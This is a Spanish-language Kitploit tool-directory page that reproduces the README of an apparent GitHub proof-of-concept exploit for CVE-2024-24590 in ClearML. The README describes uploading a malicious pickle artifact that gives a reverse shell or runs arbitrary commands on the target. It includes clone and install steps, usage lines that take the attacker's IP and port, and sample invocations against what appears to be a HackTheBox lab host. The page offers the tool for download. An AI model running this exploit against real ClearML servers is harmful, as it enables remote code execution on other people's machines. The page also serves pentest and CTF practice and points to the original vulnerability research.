Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-24590-ClearML-RCE-CMD-POC — CVE-2024-24590 ClearML RCE&CMD POC | Kitploit
Herramientas/GitHubGitHub/diegogarciayala/cve-2024-24590-clearml-rce-cmd-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónComando y ControlSeguridad de Cadena de SuministroHerramienta de Acceso Remoto
GitHubdiegogarciayala/cve-2024-24590-clearml-rce-cmd-poc

CVE-2024-24590-ClearML-RCE-CMD-POC

CVE-2024-24590 ClearML RCE&CMD POC

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
91hace 2 añosAún no revisado

Exploit Script de ClearML

Este repositorio contiene un script de exploit en Python para CVE-2024-24590. El script está diseñado para subir un archivo pickle malicioso a ClearML, que ejecuta una reverse shell o un comando personalizado.

Características

  • Sube un artefacto pickle malicioso a ClearML.
  • Ejecuta una reverse shell o un comando personalizado en la máquina objetivo.
  • Soporta nombres personalizados de proyecto y tarea.
  • Permite establecer una etiqueta en la tarea.

Uso

Requisitos previos

  • Python 3.x
  • SDK de ClearML
  • argparse (normalmente incluido con Python)

Instalación

  1. Clona el repositorio:

    root@kitploit:~
    git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
    cd CVE-2024-24590-ClearML-RCE-CMD-POC
    
  2. Instala el SDK de ClearML:

    root@kitploit:~
    pip install clearml
    clearml-init
    

Ejecutar el script

El script soporta dos modos de operación: default y cmd.

Modo por defecto

En este modo, debes proporcionar la IP y el puerto del atacante para establecer una reverse shell.

root@kitploit:~
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>

Modo CMD

En este modo, puedes proporcionar un comando personalizado para que se ejecute.

root@kitploit:~
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"

Ejemplos

root@kitploit:~
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
root@kitploit:~
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"

whoami

  • HackTheBox: sl4sh1t0
  • Telegram: sl4sh1t0
  • X (Twitter): @diegogarciayala

Créditos

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

Descargar herramienta